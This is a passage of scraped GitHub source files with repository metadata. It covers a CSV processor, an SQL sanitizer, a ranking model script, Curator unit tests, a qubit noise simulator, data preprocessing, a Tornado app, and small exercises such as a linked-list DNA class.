for row in d_reader if len(row) != 0]\n headers = [header.replace('\"', '') for header in rows[1]]\n csv_data = [headers]\n csv_data.extend(rows[4:])\n return csv_data\n\n def get_relevant_indices_and_target_headers(self) -> tuple[list, list, list]:\n headers = self.raw_data[1]\n\n ndvi_data_headers = [header for header in headers if header.startswith('NDVI')]\n ndvi_data_fields_indices = [headers.index(field) for field in ndvi_data_headers]\n\n administrative_fields_indices = [i for i in range(4)]\n administrative_fields = headers[:4]\n\n target_headers = administrative_fields + ndvi_data_headers\n\n return ndvi_data_fields_indices, administrative_fields_indices, target_headers\n\n def extract_from_fixed_hour_of_the_day(\n self,\n dat_date_format: str = SrsDefaultValues.dat_date_format,\n fixed_date_format: str = SrsDefaultValues.fixed_date_format,\n collection_hour: int = SrsDefaultValues.collection_hour,\n collection_minutes: int = SrsDefaultValues.collection_minutes\n ) -> list[list]:\n\n ndvi_data_fields_indices, administrative_fields_indices, target_headers = \\\n self.get_relevant_indices_and_target_headers()\n\n relevant_csv_data = [target_headers]\n\n for line in self.raw_data[4:]:\n temp_record = []\n date = dt.strptime(line[0].replace('\"', ''), dat_date_format)\n formatted_date = dt.strftime(date, fixed_date_format)\n line[0] = formatted_date\n if date.hour == collection_hour and date.minute == collection_minutes:\n for cell in line:\n if line.index(cell) in administrative_fields_indices or line.index(cell) in ndvi_data_fields_indices:\n temp_record.append(cell.replace('\"', ''))\n relevant_csv_data.append(temp_record)\n\n return relevant_csv_data\n\n def extract_daily_dataset(\n self,\n collection_date: datetime,\n dat_date_format: str = SrsDefaultValues.dat_date_format,\n fixed_datetime__format: str = SrsDefaultValues.fixed_date_time_format,\n ):\n relevant_csv_data = []\n ndvi_data_fields_indices, administrative_fields_indices, target_headers = \\\n self.get_relevant_indices_and_target_headers()\n relevant_csv_data.append(target_headers)\n for i, line in enumerate(self.raw_data[4:]):\n date = dt.strptime(line[0].replace('\"', ''), dat_date_format)\n if date.date() == collection_date.date():\n formatted_date = dt.strftime(date, fixed_datetime__format)\n line[0] = formatted_date\n relevant_csv_data.append(line)\n\n return relevant_csv_data\n","repo_name":"omriderhi/RS-csv-processor","sub_path":"rs_csv_processor/utils/srs_utils.py","file_name":"srs_utils.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"33024658764","text":"import mysql.connector\nimport sys\n\"\"\" \n Ensures any raw data in prod_data_insert does not violate the schema of database.\n Sometimes, there may be constraints in our schema not reflected in the prod database.\n By reprocessing the raw data, we validate the data.\n\n Assumes the local database is empty. You should run this before loading the records into\n the database\n\n Output: A cleaned file - sanitized_prod_data_insert.sql\n\"\"\"\nsys.stdout.reconfigure(encoding='utf-8')\n\ncnx = mysql.connector.connect(\n host='localhost',\n\tuser='root',\n\tpassword='password',\n\tdatabase='myschedule',\n\tport=3306\n)\ncursor = cnx.cursor()\n\n# Open the input file and read the lines\nINPUT_FILE = \"prod_data_insert.sql\" # Change this if you want to sanitize something else\nwith open(INPUT_FILE) as f:\n lines = f.read().splitlines()\n\n\nprint('USE MySchedule;')\nfailCount = 0\nerrorReasons = set()\nfor query in lines:\n # Attempt to execute the SQL query\n # Print only if it succeeds\n try:\n cursor.execute(query)\n print(query)\n except mysql.connector.Error as err:\n # Print to stderr so output redirection works properly\n err = str(err)\n print(\"stderr: failed: {}\".format(query), file=sys.stderr)\n print(\"stderr: reason: {}\\n\".format(err), file=sys.stderr)\n errorReasons.add(err[err.index(':'):])\n failCount += 1\n\nprint(\"stderr: total invalid SQL queries: {}\".format(failCount), file=sys.stderr)\nprint(\"stderr: Summary of {} general error reason(s):\".format(len(errorReasons)), file=sys.stderr)\nprint('\\n'.join(errorReasons), file=sys.stderr)\n\n# Don't actually commit anything\ncnx.rollback()\ncursor.close()\ncnx.close()","repo_name":"1nvisibilia/CS348-Project","sub_path":"sanitize.py","file_name":"sanitize.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"2521183189","text":"import pandas as pd \nimport numpy as np\nimport os \nfrom scipy.sparse import csr_matrix, hstack\n\nfrom sklearn import preprocessing\n\nmy_dir = os.environ['Trivago']\nos.chdir(my_dir)\n\nfrom Frequency_model import Frequency_model\n\nif os.environ['Trivago_debug']=='True':\n train_data = pd.read_csv(\"data/DEBUG_train.csv\")\n test_data = pd.read_csv(\"data/DEBUG_test.csv\")\n meta_data = pd.read_csv(\"data/DEBUG_metadata_updated.csv\")\nelse:\n train_data = pd.read_csv(\"data/train.csv\")\n test_data = pd.read_csv(\"data/test.csv\")\n meta_data = pd.read_csv(\"data/metadata_updated.csv\")\n\ntry:\n num_threads=int(os.environ['num_threads'])\nexcept:\n num_threads=4\n# Let's agree on this being our data \ntrain_instances = [x[1].reset_index(drop=True) for x in train_data.groupby(\"user_id\")]\ntest_instances = [x[1].reset_index(drop=True) for x in test_data.groupby(\"user_id\")]\n\n\n# This has to be tuned further\nparams = {\n'task': 'train',\n'boosting_type': 'gbdt',\n'objective': 'lambdarank',\n'lambda_l2' : 0.0037996,\n'lambda_l1' : 190.0417685,\n'metric': {'ndcg'},\n'max_position': 4, ##how many ranks the lgbm cares about\n#'metric': {'l2', 'auc', 'binary'},\n'num_leaves': 92,\n'bagging_fraction': 0.82191889,\n'bagging_freq':10,\n'max_depth': 30,\n'max_bin':63,\n'feature_fraction':0.6,\n'min_data_in_leaf':73,\n'learning_rate': 0.01,\n'verbose': 10,\n'output_model' : 'model/logs/model.txt', #Lets us load the model after\n'metric_freq':5,\n'num_threads': num_threads\n}\n\nbase_name='Final'\nif os.environ['Trivago_debug']=='True':\n num_round = 15\n base_name=base_name+'_DEBUG'\nelse:\n num_round = 17000\n\nMy_Model = Frequency_model(meta_data,params,num_round, num_threads=num_threads)\n\nTune=True\ndata_premade=False\n\nif Tune:\n My_Model.fit(train_instances,test_instances=test_instances, Tune = Tune, data_premade=data_premade, K=5)\n\n num_round_new = My_Model.optimal_rounds\n\n print(\"Retraining on full Dataset num_round=%s --------------------------\"%num_round_new)\n\n My_Model.change_num_round(num_round_new)\n\n data_premade = True\n My_Model.record_valid_preds(base_name)\nMy_Model.fit(train_instances,Tune=False, test_instances=test_instances, data_premade=data_premade) \n\nMy_Model.predict(test_instances,out=False)\nprint(My_Model.timer)\nMy_Model.predictions_to_csv(\"%s.csv\"%base_name)\nMy_Model.record_test_preds(base_name)\nMy_Model.log_model(base_name, newname=False)\n","repo_name":"Fisch-Alex/Recsys2019","sub_path":"model/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"27713988220","text":"\"\"\"test_action_clusterrouting\"\"\"\nfrom unittest import TestCase\nfrom mock import Mock\nfrom curator.actions import ClusterRouting\n# Get test variables and constants from a single source\nfrom . import testvars\n\nclass TestActionAllocation(TestCase):\n def test_bad_client(self):\n self.assertRaises(TypeError, ClusterRouting, 'invalid', setting='enable')\n def test_bad_setting(self):\n client = Mock()\n self.assertRaises(\n ValueError, ClusterRouting, client, setting='invalid'\n )\n def test_bad_routing_type(self):\n client = Mock()\n self.assertRaises(\n ValueError,\n ClusterRouting,\n client,\n routing_type='invalid',\n setting='enable'\n )\n def test_bad_value_with_allocation(self):\n client = Mock()\n self.assertRaises(\n ValueError,\n ClusterRouting,\n client,\n routing_type='allocation',\n setting='enable',\n value='invalid'\n )\n def test_bad_value_with_rebalance(self):\n client = Mock()\n self.assertRaises(\n ValueError,\n ClusterRouting,\n client,\n routing_type='rebalance',\n setting='enable',\n value='invalid'\n )\n def test_do_dry_run(self):\n client = Mock()\n cro = ClusterRouting(\n client,\n routing_type='allocation',\n setting='enable',\n value='all'\n )\n self.assertIsNone(cro.do_dry_run())\n def test_do_action_raise_on_put_settings(self):\n client = Mock()\n client.cluster.put_settings.return_value = None\n client.cluster.put_settings.side_effect = testvars.fake_fail\n cro = ClusterRouting(\n client,\n routing_type='allocation',\n setting='enable',\n value='all'\n )\n self.assertRaises(Exception, cro.do_action)\n def test_do_action_wait(self):\n client = Mock()\n client.cluster.put_settings.return_value = None\n client.cluster.health.return_value = {'relocating_shards':0}\n cro = ClusterRouting(\n client,\n routing_type='allocation',\n setting='enable',\n value='all',\n wait_for_completion=True\n )\n self.assertIsNone(cro.do_action())\n","repo_name":"elastic/curator","sub_path":"tests/unit/test_action_clusterrouting.py","file_name":"test_action_clusterrouting.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":3017,"dataset":"github-code","pt":"84"} +{"seq_id":"12165290416","text":"\"\"\"\nThis module implements a simulator for a noisy qubit\n\"\"\"\n\n# preample\nimport numpy as np\nfrom functools import reduce\nfrom itertools import product\n###############################################################################\nclass NoisyQubitSimulator(object):\n \"\"\"\n Class for simulating a noisy spin qubit \n \"\"\"\n\n def __init__(self, T, M, tau, sigma, Omega, K, Type=\"Gaussian\", P_desired=[None,None,None]):\n \"\"\"\n Class constructor\n \n T : The total evolution time\n M : The number of discrete time steps \n tau : A list of the lists of centres of the pulses along each direction, put [-1] for no pulse (t is in [0,T])\n sigma : The standard deviation of the gaussian pulses along each direction/ or the pulse width in case of square pulses\n Omega : The energy gap of the qubit \n K : The number of realizations for the monte carlo simulation\n Type : Pulse shape which is either \"Square\" or \"Gaussian\"(default)\n P_desired : A list of PSD of noise along each direction, put None for a noiseless direction (default is noiseless)\n \"\"\"\n \n # store the simulation parameters\n self.T = T\n self.M = M\n self.tau = tau\n self.sigma = sigma\n self.Omega = Omega\n self.K = K\n self.Type = Type\n self.P_desired = P_desired\n \n # initialize the pulse time-domain waveform arrays \n self.h_x = np.zeros((1,self.M)) \n self.h_y = np.zeros((1,self.M))\n self.h_z = np.zeros((1,self.M))\n \n # construct the time vector\n self.delta_t = T/M # time step\n self.time_range = [(0.5*self.delta_t) + (j*self.delta_t) for j in range(M)] # list of time steps\n\n\n # construct the matrix representing the Gaussian bases for each directions \n if self.Type==\"Gaussian\":\n self.theta_x = np.array( [[np.exp(-0.5*((t-tau)/self.sigma)**2) for tau in self.tau[0]] for t in self.time_range] )\n self.theta_y = np.array( [[np.exp(-0.5*((t-tau)/self.sigma)**2) for tau in self.tau[1]] for t in self.time_range] )\n self.theta_z = np.array( [[np.exp(-0.5*((t-tau)/self.sigma)**2) for tau in self.tau[2]] for t in self.time_range] )\n \n \n # define the Pauli matrices\n self.sigma_x = np.array([[0.,1.],[1.,0.]])\n self.sigma_y = np.array([[0.,-1j],[1j,0.]])\n self.sigma_z = np.array([[1.,0.],[0.,-1.]])\n \n \n def set_pulses(self, alpha):\n \"\"\"\n This method to construct the evolution matrix for all noise realizations given the pulses amplitudes\n \n alpha: A list of the lists of amplitudes of the pulses along each direction\n \"\"\"\n \n # unpack the amplitude vector for each direction\n self.alpha_x,self.alpha_y,self.alpha_z = alpha\n \n # construct the waveforms\n if self.Type == \"Gaussian\": \n self.h_x = (self.theta_x @ self.alpha_x)\n self.h_y = (self.theta_y @ self.alpha_y)\n self.h_z = (self.theta_z @ self.alpha_z) \n else:\n pwidth = self.sigma\n self.h_x = sum( [np.array([(t>(tau-0.5*pwidth))*(t<(tau+0.5*pwidth))*A for t in self.time_range]) for tau, A in zip(self.tau[0],self.alpha_x)] )\n self.h_y = sum( [np.array([(t>(tau-0.5*pwidth))*(t<(tau+0.5*pwidth))*A for t in self.time_range]) for tau, A in zip(self.tau[1],self.alpha_y)] )\n self.h_z = sum( [np.array([(t>(tau-0.5*pwidth))*(t<(tau+0.5*pwidth))*A for t in self.time_range]) for tau, A in zip(self.tau[2],self.alpha_z)] )\n \n # generate the noise realizations\n self.generate_arbitrary_noise(self.P_desired)\n \n # construct a list of the Hamiltonians for each noise realization\n self.set_hamiltonians()\n \n # construct the unitary matrix for each realization\n self.evolve()\n \n \n def generate_arbitrary_noise(self,P_desired):\n \"\"\"\n generate random noise according to some desired power spectral density according to the algorithm here:\n https://stackoverflow.com/questions/25787040/synthesize-psd-in-matlab\n \n P_desired: a list of arrays representing desired PSD [single side band representation] along x,y,z\n \"\"\"\n \n Ts = self.delta_t # sampling time (1/sampling frequency)\n N = self.M # number of required samples\n \n if not P_desired[0] is None:\n # define a list to store the different noise realizations\n self.beta_x = []\n \n # generate different realizations\n for _ in range(self.K):\n #1) add random phase to the properly normalized PSD\n P_temp = np.sqrt(P_desired[0]*N/Ts)*np.exp(2*np.pi*1j*np.random.rand(1,N//2))\n \n #2) add the symmetric part of the spectrum\n P_temp = np.concatenate( ( P_temp , np.flip(P_temp.conj()) ), axis=1 )\n \n #3) take the inverse Fourier transform\n x = np.real(np.fft.ifft(P_temp))\n \n # store\n self.beta_x.append(np.reshape(x,self.h_x.shape))\n else:\n # no noise in this direction\n self.beta_x = [np.zeros(self.h_x.shape) for k in range(self.K)]\n \n if not P_desired[1] is None: \n # define a list to store the different noise realizations\n self.beta_y = [] \n # generate different realizations\n for _ in range(self.K):\n #1) add random phase to the properly normalized PSD\n P_temp = np.sqrt(P_desired[1]*N/Ts)*np.exp(2*np.pi*1j*np.random.rand(1,N//2))\n \n #2) add the symmetric part of the spectrum\n P_temp = np.concatenate( ( P_temp , np.flip(P_temp.conj()) ), axis=1 )\n \n #3) take the inverse Fourier transform\n x = np.real(np.fft.ifft(P_temp))\n \n # store\n self.beta_y.append(np.reshape(x,self.h_y.shape))\n else:\n # no noise in this direction\n self.beta_y = [np.zeros(self.h_y.shape) for k in range(self.K)]\n \n if not P_desired[2] is None:\n # define a list to store the different noise realizations\n self.beta_z = [] \n # generate different realizations\n for _ in range(self.K):\n #1) add random phase to the properly normalized PSD\n P_temp = np.sqrt(P_desired[2]*N/Ts)*np.exp(2*np.pi*1j*np.random.rand(1,N//2))\n \n #2) add the symmetric part of the spectrum\n P_temp = np.concatenate( ( P_temp , np.flip(P_temp.conj()) ), axis=1 )\n \n #3) take the inverse Fourier transform\n x = np.real(np.fft.ifft(P_temp))\n \n # store\n self.beta_z.append(np.reshape(x,self.h_z.shape)) \n else:\n # no noise in this direction\n self.beta_z = [np.zeros(self.h_z.shape) for k in range(self.K)] \n \n def set_hamiltonians(self):\n \"\"\"\n This method is to construct a list of Hamiltonians to calculate the propagators\n \"\"\"\n \n # construct and store the Hamitlonian at each time step for all noise realizations\n self.Hamiltonians = [ [0.5 * self.sigma_z * (self.Omega + b_z + h_z) + 0.5 * self.sigma_x * (h_x + b_x) + 0.5 * self.sigma_y * (h_y + b_y) for b_x, b_y, b_z, h_x, h_y,h_z in zip(beta_x, beta_y, beta_z, self.h_x,self.h_y,self.h_z)] for beta_x,beta_y,beta_z in zip(self.beta_x,self.beta_y,self.beta_z)]\n\n \n def evolve(self):\n \"\"\"\n This method is to calculate the final unitary\n \"\"\"\n \n # define a lambda function for calculating the propagators\n evolve = lambda U,U_j: U_j @ U\n \n # calculate and accumalate all propagators till the final one, and repeat over all realizations\n self.U = [reduce(evolve, [self.expm2(self.delta_t*H) for H in Hamiltonian]) for Hamiltonian in self.Hamiltonians]\n \n def measure(self, initial_state, measurement_operator):\n \"\"\"\n This method is to perfrom measurements on the final state.\n \n initial_state : The density matrix of the initial state\n measurement_operator: Measurement Operator\n \"\"\"\n # initialize an empty list to store the expectation for each realization\n expectation = []\n \n # loop over all realizations\n for U in self.U:\n # calculate the final state\n final_state = U @ initial_state @ U.conj().T\n \n # calculate the probability of the outcome\n expectation.append( np.real( np.trace(final_state @ measurement_operator) ) )\n\n return np.average(expectation)\n\n def measure_all(self):\n \"\"\"\n This method to simulate the full tomogrpahic set of measurements with all initial states and all measurement operators\n \"\"\"\n \n # define a list of initial states corresponding to the up/down eignestates of each of the Pauli measurement operators\n initial_states = [np.array([[0.5,0.5],[0.5,0.5]]), np.array([[0.5,-0.5],[-0.5,0.5]]),\n np.array([[0.5,-0.5j],[0.5j,0.5]]),np.array([[0.5,0.5j],[-0.5j,0.5]]),\n np.array([[1,0],[0,0]]), np.array([[0,0],[0,1]]) ]\n \n # define the list of measurement operators\n measurement_operators = [self.sigma_x, self.sigma_y, self.sigma_z]\n \n # calculate each measurement \n expectations = [self.measure(rho,X) for rho,X in product(initial_states, measurement_operators) ]\n \n return np.array(expectations)\n \n def measure_one_shot(self, initial_state, measurement_projector):\n \"\"\"\n This method simulates one shot mesaurements returns a list of +1/-1 correspnding to each measurement\n \"\"\"\n \n # simulate the coin flip with outocomes +1/-1, repeated for each noise realization\n return [2*int( np.random.rand() > np.real(np.trace( U @ initial_state @ U.conj().T @ measurement_projector ) ) )-1 for U in self.U]\n \n def expm2(self, H):\n \"\"\"\n This is an internal method to caclulate the matrix exponential more efficiently using Euler formula. Works only for qubits.\n \"\"\"\n \n # parameterize the Hamiltonian in terms of the three Pauli basis\n a_vector = [np.real(H[0,1]), np.imag(H[0,1]), H[0,0]]\n \n # calculate the norm of the Pauli vector\n a = np.sqrt(a_vector[0]**2 + a_vector[1]**2 + a_vector[2]**2 )\n \n if a==0:\n return np.array([[1.,0.],[0.,1.]]) # Identity\n else:\n # use Euler's formula to calculate e^(-i a \\hat{n} \\cdot \\sigma) = I cos a - i (\\hat{n}\\cdot\\sigma) sin a\n return np.cos(a)*np.array([[1.,0.],[0.,1.]]) - 1j*H*np.sin(a)/a","repo_name":"akramyoussry/BQNS","sub_path":"src/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":11298,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"84"} +{"seq_id":"17939649955","text":"from html.parser import HTMLParser\nfrom collections import defaultdict\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.feature_extraction.text import TfidfTransformer\nimport pandas as pd\nimport sys\nsys.path.append('../')\nimport warnings\nimport os\nimport numpy as np\nimport config.setup as setup\nfrom config.config import Config\nwarnings.filterwarnings('ignore')\n\n\nclass MyHTMLParser(HTMLParser):\n def __init__(self):\n self.count = defaultdict(int)\n super().__init__()\n\n def handle_starttag(self, tag, attrs):\n self.count[tag] += 1\n\n def handle_startendtag(self, tag, attrs):\n self.count[tag] += 1\n\ndef count_tags(html):\n parser = MyHTMLParser()\n parser.feed(html)\n return parser.count\n\n# 構成のセットアップ\ncfg = setup.setup(Config)\n\n# データの読込\ntrain_raw = pd.read_csv(os.path.join(cfg.INPUT, \"raw/train.csv\"))\ntest_raw = pd.read_csv(os.path.join(cfg.INPUT, \"raw/test.csv\"))\ntrain_raw['train_flag'] = True\ntest_raw['train_flag'] = False\ndf = pd.concat([train_raw, test_raw])\n\ndf_goal = df['goal'].replace('100000+', '100000-100000').str.split('-', expand=True)\ndf_goal.rename(columns={0: 'goal_inf', 1: 'goal_sup'}, inplace=True)\ndf['mid_goal'] = ((df_goal['goal_inf'].astype(int) + df_goal['goal_sup'].astype(int))/2).astype(int)\ndf['len_html'] = df['html_content'].str.len()\ndf['word_count'] = df['html_content'].str.split().str.len()\ndf['inner_link'] = df['html_content'].str.count('href=')\ndf['num_lines'] = df['html_content'].str.count('\\n') + 1\ndf_goal = df['html_content'].replace('\\n', '')\n\ndf['html_content'] = df['html_content'].astype(str)\ncat1 = df['category1'].tolist()\ncat2 = df['category2'].tolist()\nreplaced_texts = [text.replace('\\n', '')\n for text in df['html_content'].tolist()]\nconverted_texts = []\nfor cat1_, cat2_, text in zip(cat1, cat2, replaced_texts):\n found = text.replace('
', '')[:-6]\n converted_texts.append(cat1_ + ' ' + cat2_ + ' ' + found)\ndf['html_content'] = converted_texts\n\n# タグの頻度から TF-IDF 値算出\nwhole_tag_df = pd.DataFrame(map(count_tags, df['html_content'])).fillna(0)\ntf_trans = TfidfTransformer()\ntag_columns = whole_tag_df.columns\nwhole_tag_df = pd.DataFrame(tf_trans.fit_transform(whole_tag_df).todense(), columns=tag_columns)\ndf[tag_columns] = whole_tag_df\ndf['num_tag'] = whole_tag_df.sum(axis=1)\n\n# goal の分割\ndf[['goal1', 'goal2']] = df['goal'].str.split('-', expand=True)\ndf['goal1'] = df['goal1'].str.rstrip('+').fillna(-100).astype(int)\ndf['goal2'] = df['goal2'].str.rstrip('+').fillna(-100).astype(int)\ndf['goal_diff'] = df['goal2'] - df['goal1']\n\n# labelEncoding\ncategory_list = ['country', 'category1', 'category2']\nfor cat in category_list:\n le = LabelEncoder()\n le.fit(df[cat])\n label_encoded_column = le.fit_transform(df[cat])\n df[cat] = pd.Series(label_encoded_column).astype('category')\n\ndf_train = df[df['train_flag']==True]\ndf_train = df_train.drop(['train_flag'], axis=1)\ndf_train[cfg.target] = df_train[cfg.target].astype('int')\ndf_test = df[df['train_flag']==False]\ndf_test = df_test.drop(['train_flag'], axis=1)\n\nprint(df.columns.tolist())\ndf_train.to_csv(os.path.join(cfg.INPUT, \"processed/processed_train.csv\"), index=False)\ndf_test.to_csv(os.path.join(cfg.INPUT, \"processed/processed_test.csv\"), index=False)\n","repo_name":"sumugit/mufg_champion_ship","sub_path":"source/scripts/preprocess/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"37567584562","text":"import tornado.ioloop\nimport tornado.web\nfrom controller import ResultsHandler, ResultadosAgrupadosHandler, MaiorIncidenciaHandler, \\\n VideoHandler, RodoviaHandler\nimport os\n\n# Obtém o diretório atual do arquivo app.py\ncurrent_dir = os.path.dirname(os.path.abspath(__file__))\n\n# Obtém o caminho absoluto para o diretório data dentro do container\ndata_dir = os.path.join(current_dir, 'data')\ndef make_app():\n # Obtém o caminho absoluto para o arquivo labtrans.db dentro do diretório data\n db_path = os.path.join(data_dir, 'labtrans.db')\n app = tornado.web.Application([\n (r\"/results\", ResultsHandler),\n (\"/resultados_agrupados\", ResultadosAgrupadosHandler),\n (r\"/maior-incidencia/([^/]+)\", MaiorIncidenciaHandler),\n (r\"/videos\", VideoHandler),\n (r\"/rodovias\", RodoviaHandler),\n ])\n\n app.settings['debug'] = True\n # Configura o caminho do arquivo labtrans.db no objeto Application\n app.settings['db_path'] = db_path\n return app\n\n\nif __name__ == \"__main__\":\n app = make_app()\n app.listen(8888)\n tornado.ioloop.IOLoop.current().start()","repo_name":"medeiroslucass/labtrans-challenger","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"9786068804","text":"#53. Maximum Subarray\nfrom typing import List\n\nimport numpy as np\n\n\nclass Solution:\n def maxSubArray(self, nums: List[int]) -> int:\n if len(nums) == 1:\n return nums[0]\n sum = nums[0]\n dp = np.zeros(len(nums), dtype=int)\n dp[0] = nums[0]\n for i in range(1, len(nums)):\n if dp[i-1] + nums[i] > nums[i]:\n dp[i] = dp[i - 1] + nums[i]\n else:\n dp[i] = nums[i]\n sum = dp[i] if dp[i] > sum else sum\n\n return sum\n\ns = Solution\nnums = [-2,1,-3,4,-1,2,1,-5,4]\nnums = [-1, -2]\n# nums = [1, 2]\nprint(s.maxSubArray(s, nums))\nexit(0)\n","repo_name":"nightsnack/leetcode","sub_path":"Python/q53.py","file_name":"q53.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"39949009371","text":"\"\"\"\nlinkedlist.py\n\nA Linked List interface and implementation in Python\nThis version uses a cursor. Using indices is inherently inefficient and\nhides the strengths of the linked list.\nCursors, immutable, are created by list methods.\n\nauthor: James Heliotis\nRohit Ravishankar (rr9105@rit.edu)\nParinitha Nagaraja (pn4972@rit.edu)\n\"\"\"\n\nclass DNAList:\n\n __slots__ = '__front', '__back', 'gene'\n\n def __init__( self, gene='' ):\n \"\"\" Create an empty list.\n \"\"\"\n self.__back = None\n self.__front = None\n\n next = self.__front\n if len(gene) > 1:\n for i in range(len(gene)):\n newNode = LinkedNode(gene[i])\n if i == 0:\n self.__front = newNode\n next = self.__front\n else:\n next.link = newNode\n next = next.link\n if i is (len(gene) - 1):\n self.__back = newNode\n\n else:\n self.gene = gene\n\n def append( self, item ):\n \"\"\" Add value to the end of the list.\n List is modified.\n :param new_value: the value to add\n :return: None\n \"\"\"\n newNode = LinkedNode( item )\n if self.__front == None and self.__back == None:\n self.__front = newNode\n else:\n self.__back.link = newNode\n self.__back = newNode\n\n def copy(self):\n \"\"\"\n Create a copy of the list\n :return: None\n \"\"\"\n newList = DNAList()\n old = self.__front\n\n while old != None:\n newList.append(old.value)\n old = old.link\n return newList\n\n\n def __str__(self):\n \"\"\" Print the contents of a list on a single line, first to last.\n \"\"\"\n result = \"\"\n node = DNAList()\n node.__front = self.__front\n if node.__front != None:\n result += str(node.__front.value)\n node.__front = node.__front.link\n while node.__front:\n result += \" \" + str(node.__front.value)\n node.__front = node.__front.link\n return result\n\n def snip(self, i1, i2):\n \"\"\"\n Removes a portion of the gene from index i1 to i2\n :param i1: starting index (inclusive)\n :param i2: ending index (exclusive)\n :return: None\n \"\"\"\n cursor = self.__front\n\n previousPointer = self.__front\n subStringBeginning = self.__front\n nextPointer = self.__front\n\n counter = 0\n\n while cursor != None:\n if counter <= (i1 - 2):\n previousPointer = previousPointer.link\n if counter <= (i1 - 1):\n subStringBeginning = subStringBeginning.link\n if counter <= (i2 - 1):\n nextPointer = nextPointer.link\n\n cursor = cursor.link\n counter += 1\n\n if subStringBeginning.value == previousPointer.value :\n self.__front = nextPointer\n else:\n previousPointer.link = nextPointer\n return self\n\n def join(self, other):\n \"\"\"\n :param other:\n :return:\n \"\"\"\n self.__back.link = other.__front\n self.__back = other.__back\n\n\n def replace(self, repstr, other):\n\n headPointer = LinkedNode(None, self.__front)\n cursor = headPointer\n cursor1 = headPointer\n stringBeginningPointer = headPointer\n\n\n # To traverse the string that needs to be replaced\n counter = 0\n\n while cursor != None:\n if cursor1.link.value == repstr[counter]:\n stringBeginningPointer = cursor1\n elif cursor1.value != repstr[counter]:\n pass\n else:\n pass\n while counter < len(repstr):\n if cursor1 == None:\n return self\n elif cursor1.value == repstr[counter]:\n cursor1 = cursor1.link\n counter += 1\n else:\n break\n if counter == len(repstr):\n if stringBeginningPointer.link == self.__front:\n self.__front = other.__front\n else:\n stringBeginningPointer.link = other.__front\n other.__back.link = cursor1\n break\n\n counter = 0\n if cursor1.link != None:\n cursor1 = cursor1.link\n cursor = cursor.link\n return self\n\n\n def splice(self, ind, other):\n\n index = 0\n\n cursor = self.__front\n previousPointer = self.__front\n nextPointer = self.__front\n\n if ind == 0:\n\n # If the index is = 0 splice list at the beginning\n previousPointer = other.__front\n other.__back.link = self.__front\n self.__front = previousPointer\n else:\n while cursor != None:\n\n # For the case where the list isn't being spliced at the end\n if index == ind and cursor.link != None:\n cursor = cursor.link\n nextPointer = previousPointer.link\n previousPointer.link = other.__front\n other.__back.link = nextPointer\n\n # For the case where the list is being spliced at the end\n elif index == ind and cursor.link == None:\n cursor.link = other.__front\n self.__back = other.__back\n break\n\n else:\n previousPointer = previousPointer.link\n cursor = cursor.link\n index += 1\n cursor = self.__front\n return self\n\n\"\"\"\nnode.py\nauthor: James heliotis\ndescription: A linkable node class for use in stacks, queues, and linked lists\n\"\"\"\n\nclass LinkedNode:\n\n __slots__ = \"value\", \"link\"\n\n def __init__( self, value, link = None ):\n \"\"\" Create a new node and optionally link it to an existing one.\n param value: the value to be stored in the new node\n param link: the node linked to this one\n \"\"\"\n self.value = value\n self.link = link\n\n def __str__( self ):\n \"\"\" Return a string representation of the contents of\n this node. The link is not included.\n \"\"\"\n return str( self.value )\n\n def __repr__( self ):\n \"\"\" Return a string that, if evaluated, would recreate\n this node and the node to which it is linked.\n This function should not be called for a circular\n list.\n \"\"\"\n return \"LinkedNode(\" + repr( self.value ) + \",\" + \\\n repr( self.link ) + \")\"\n\n","repo_name":"rohitravishankar/Year-1","sub_path":"CSCI-603/Lab6/dnalist.py","file_name":"dnalist.py","file_ext":"py","file_size_in_byte":6752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"42012863369","text":"'''\nCreated on Oct 10, 2015\n\n@author: Sameer Adhikari\n'''\nfrom pprint import PrettyPrinter\n\n# Example illustrating mixing keys in a dictionary\n# The keys can be any hashable type\n\nrandkeys = {}\nrandkeys['astring'] = 'a string'\nrandkeys[7] = 'an integer'\nrandkeys[5.7] = 'a float'\nrandkeys[('astring', 7)] = 'a tuple'\n\nclass AnObject(object):\n def __init__(self, avalue):\n self.avalue = avalue\n\nanobject = AnObject(13) \nrandkeys[anobject] = 'an object'\nanobject.avalue = 11\n\nalist = [1, 2, 3]\nadict = {'a': 1}\n\ntry:\n randkeys[alist] = 'a list'\nexcept: \n print('Unable to use a list as a key')\n\ntry:\n randkeys[adict] = 'a dict'\nexcept: \n print('Unable to use a dict as a key')\n\npp = PrettyPrinter(indent=4)\npp.pprint(randkeys)","repo_name":"tri2sing/PyOO","sub_path":"misc/randomkeys.py","file_name":"randomkeys.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"41769848769","text":"import discord\nfrom discord.ext import commands\nimport asyncio\nimport time\nimport datetime\nfrom time import sleep\nimport sys\nimport random\nimport traceback\nimport argparse\nimport sqlite3\nimport urllib.request\nimport bs4\nimport html\nimport twilio\nfrom twilio.rest import Client\nimport pyfiglet\nimport re\nimport pdb\nimport json\nimport atexit\nimport dweepy\nimport asyncpg\nimport os\nimport aiohttp\nimport subprocess\nimport copy\n\nasync def get_prefixes(bot,msg):\n if msg.guild == None:\n prefixes = [\"c!\"]\n else:\n try:\n data = 